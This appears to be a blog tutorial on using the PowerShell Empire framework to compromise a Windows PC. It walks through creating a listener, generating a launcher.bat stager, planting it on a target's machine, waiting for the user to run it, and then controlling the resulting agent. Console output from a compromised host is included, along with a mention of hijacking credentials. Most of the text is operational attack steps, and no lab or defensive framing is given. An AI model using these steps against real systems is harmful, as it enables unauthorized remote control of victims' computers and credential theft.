Attack The PowerShell

Empire is a tool that helps us, to access into the target’s PC by Powershell process.
The big advantage of Empire is, that you can active more than 1 agent at the same time.
With Empire we have the ability to hijack the Users credentials as well.

[LETS MAKE IT WORK]
#1) Open terminal, navigate to your Empire Folder & type:
*In our case is Tools folder*
assault@kalivm:~/Tools/Empire$ sudo ./empire

Like this:

Em-3

*The empire is in green color, that’s means that the empire is an executable*

*Let’s hit enter to access into Empire tool*

Learn Empire - Attack The PowerShell: http://linuxphilosophy.com/rtfm/more/empire/attack-the-powershell/

 

#2) Type 1 by 1
(Empire) > listeners

*If you haven’t active listeners, you will get this output*
(Empire) > listeners
[!] No Listeners currently active
(Empire: listeners) >

*If you have an active listeners, you will get this output*
(Empire) > listeners

[*] Active listeners:

ID    Name              Host                                                    Type              Delay/Jitter                   KillDate       Redirect Target
—    —-            —–                                         ——-         ————                ——–       —————–
1      hack                http://192.168.50.15:8080              native             5/0.0

(Empire: listeners) >

*Let’s assume that this is your 1st time that you’ve launch Empire, So let’s ignore the 2nd output for now*
*Let’s continue…*

(Empire: listeners) > info

*You will get this output – this is your listener info*

*Pay attention – the listener’s Name is “test” by the default, we love to change that name to any other name – but you can leave it as “test” if you want*

Em-4

 

*Let’s change the Name – type 1 by 1*

(Empire: listeners) > set Name hack
(Empire: listeners) > execute
(Empire: listeners) > info

*And this is the result*

Em-5

 

#3) Let’s make the hack payload executable as a .bat file

*Type 1 by 1*
(Empire: listeners) > usestager launch_bat hack
(Empire: stager/launcher_bat) > execute
*And we will get this output*
[*] Stager output written out to: /tmp/launcher.bat

(Empire: stager/launcher_bat) >

#4) Open another terminal tab, switch to root & navigate to the .bat file & copy the file to our none-root user
*Don’t forget, we ‘re working under root user, only if we have to, in really really rare cases, in the long run, we’re working under none-root user always!*
root@kalivm:~# cd /tmp/
root@kalivm:/tmp# ls
launcher.bat
root@kalivm:/tmp# cp launcher.bat /home/tux/Documents
root@kalivm:/tmp# exit
logout
tux@kalivm:~$ exit

#5) Change manually the payload name to the name that you choose, & inject the hack.bat file into your target’s PC, and wait until the user will launch the .bat file.

*Once the target will do this, you will get this output*

(Empire: stager/launcher_bat) > [+] Initial agent R11CTZCNR1HRAF23 from 192.168.50.7 is active

*Type*
(Empire: stager/launcher_bat) > agents
*Now you will get an output with your active agents – Type*
(Empire: agents) > interact R11CTZCNR1HRAF23
*Let’s type info, we want to know what’s happening “behind the scene”*
(Empire: R11CTZCNR1HRAF23) > info

[*] Agent info:

ps_version                            2
old_uris                                 None
jitter                                       0.0
servers                                   None
internal_ip                            192.168.50.7
working_hours
session_key                           d%j_RBn46<C.5O+V:Ua$x~Xh1rv7INuT
children                                 None
checkin_time                        2016-08-18 15:49:58
hostname                              KENNY
delay                                       5
uris                                          /admin/get.php,/news.asp,/login/process.jsp
username                               Kenny\Admin0
kill_date
parent                                    None
process_name                       powershell
listener                                   http://192.168.50.15:8080/
sessionID                               R11CTZCNR1HRAF23
process_id                              992
os_details                               Microsoft Windows 7 Professional
lost_limit                                60
ID                                             8
name                                       R11CTZCNR1HRAF23
external_ip                             192.168.50.7
headers
user_agent                             Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
lastseen_time                        2016-08-18 16:02:14
high_integrity                        0

(Empire: R11CTZCNR1HRAF23) >

 

*Now, feel free to run any command that you want*

*BTW, look at the process_name up here*

 

ENJOY! 🙂

 

Here is an example by Gamer Forever